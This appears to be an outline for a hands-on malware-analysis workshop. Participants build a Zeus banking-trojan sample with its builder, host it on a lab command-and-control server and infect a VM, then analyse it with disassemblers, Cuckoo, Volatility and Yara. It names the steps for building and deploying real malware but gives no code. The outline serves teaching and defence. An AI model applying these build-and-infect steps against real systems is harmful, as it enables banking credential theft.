Practical workshop on malware analysis.

How to analyze malware? Let's create one first... and then analyze it!

• Download and import VBox VMs
• Run scripts/enable-network.sh to allow bot VM to access Internet
• Download Zeus Builder
• Configure sample (config.txt & webinject.txt)
• Build sample
• Upload bot.exe and config.bin to C&C server (/var/www/ccserver)
• Infect the VM

• file, strings
• Disassemble bot.exe
  • objdump
  • Binary Ninja
  • IDA
• Look for code injection techniques:
  • (Hint) CreateRemoteThread

More on code injection: injectopi

• Install and set-up Cuckoo
• Analyze bot.exe
• Inspect cuckoo's report
• Dump the memory
• Inspect the memory dump
  • Install and use volatility
  • Have a look at Yara
• Analyze Network Traffic

Automate the extraction of the WebInject targets given a sample.

• Develop a cuckoo package
• Execute the sample
• Open the browser
  • Interesting info are allocated into the browser's address space!
• Dump the memory
• Look for interesting stuff! ;-)
• Automate extraction, volatility plugin?